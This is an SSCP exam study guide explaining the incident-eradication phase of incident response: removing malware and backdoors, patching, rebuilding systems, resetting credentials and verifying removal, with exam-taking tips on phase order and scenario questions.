Incident Eradication – SSCP Exam Guide
What is Incident Eradication?
Incident eradication is a critical phase in the incident response lifecycle that focuses on completely removing the root cause of a security incident from the affected environment. This phase comes after the containment phase and before the recovery phase. The goal is to ensure that all traces of the threat — including malware, backdoors, compromised accounts, and unauthorized access mechanisms — are thoroughly eliminated so the incident does not recur.
Why is Incident Eradication Important?
Eradication is essential because failing to fully remove the threat can lead to:
• Re-infection or recurrence of the same incident
• Persistent backdoors that attackers can exploit later
• Continued data exfiltration or system compromise
• Undermining the recovery phase, making restoration efforts futile
• Regulatory and compliance failures if the organization cannot demonstrate that the threat was fully addressed
Proper eradication ensures the integrity of the environment before systems are returned to normal operations.
How Does Incident Eradication Work?
Eradication involves several key activities:
1. Identifying the Root Cause
The incident response team must determine exactly how the attack occurred. This includes identifying the vulnerability exploited, the attack vector used, and the extent of the compromise. Root cause analysis is fundamental to effective eradication.
2. Removing Malware and Artifacts
All malicious code, scripts, files, tools, and artifacts planted by the attacker must be located and removed. This may involve running antivirus and anti-malware scans, manually inspecting systems, and using forensic tools to identify hidden threats.
3. Eliminating Backdoors
Attackers often install backdoors to maintain persistent access. These must be found and removed. This includes rogue user accounts, unauthorized remote access tools, modified system binaries, and hidden scheduled tasks or cron jobs.
4. Patching and Hardening
The vulnerability that was exploited to gain access must be patched or mitigated. This could involve applying software patches, updating configurations, closing unnecessary ports, or strengthening access controls. If the vulnerability is not addressed, the same attack can succeed again.
5. Rebuilding Compromised Systems
In many cases, the most reliable approach to eradication is to rebuild affected systems from known-good media or trusted backups. Attempting to clean a deeply compromised system may leave hidden threats. Reimaging ensures a clean baseline.
6. Resetting Credentials
All compromised or potentially compromised credentials — passwords, API keys, certificates, and tokens — must be changed. This prevents the attacker from regaining access using stolen credentials.
7. Verifying Eradication
After removal activities, the team must verify that the threat has been fully eliminated. This involves scanning systems, reviewing logs, and monitoring for signs of continued compromise before transitioning to the recovery phase.
Eradication in the Incident Response Lifecycle
The standard incident response phases are:
1. Preparation
2. Detection and Analysis (Identification)
3. Containment
4. Eradication
5. Recovery
6. Lessons Learned (Post-Incident Activity)
Eradication sits between containment and recovery. Containment stops the spread of the incident, eradication removes the threat, and recovery restores systems to normal operations. These phases sometimes overlap and may be iterative.
Key Concepts to Remember for the Exam
• Eradication is about removing the root cause and all traces of the attack
• It is performed after containment and before recovery
• Rebuilding from trusted media is often preferred over attempting to clean a compromised system
• Patching the exploited vulnerability is a critical part of eradication
• Credential resets are a necessary component
• Eradication must be verified before moving to recovery
• The eradication phase may require coordination with forensics teams to ensure evidence is preserved
Exam Tips: Answering Questions on Incident Eradication
1. Know the order of incident response phases. Many exam questions test whether you can correctly sequence the phases. Remember: Preparation → Detection/Identification → Containment → Eradication → Recovery → Lessons Learned. If a question asks what comes after containment, the answer is eradication.
2. Distinguish eradication from containment and recovery. Containment is about stopping the spread and limiting damage. Eradication is about removing the threat entirely. Recovery is about restoring systems to normal operation. If a question describes removing malware and patching vulnerabilities, it is describing eradication.
3. Look for keywords in the question. Terms like "root cause removal," "eliminating the threat," "removing malware," "patching vulnerabilities," and "rebuilding systems" all point to eradication.
4. Rebuilding vs. cleaning. If a question asks about the most thorough or reliable method of eradication, rebuilding from known-good media or trusted backups is typically the best answer. Cleaning a system may miss deeply embedded threats.
5. Remember the connection to vulnerability remediation. Eradication includes addressing the vulnerability that allowed the attack. If the vulnerability is not fixed, the attacker or another threat actor can exploit it again.
6. Evidence preservation matters. In exam scenarios, if you are asked about eradication while an investigation is ongoing, remember that forensic evidence should be collected and preserved before eradication activities modify or destroy evidence.
7. Watch for scenario-based questions. The SSCP exam often presents scenarios where you must choose the correct action. If a system has been contained and the question asks for the next step, focus on eradication activities such as removing malware, patching, or rebuilding.
8. Credential management during eradication. If a question mentions compromised user accounts or stolen passwords, remember that resetting credentials is part of the eradication process, not just recovery.
9. Verification is part of eradication. Do not move to recovery until eradication is confirmed. If an exam question asks what should be done before restoring systems to production, the answer involves verifying that the threat has been fully removed.
10. Iterative nature. Some questions may test whether you understand that incident response phases can be iterative. If new threats are discovered during recovery, you may need to return to eradication.
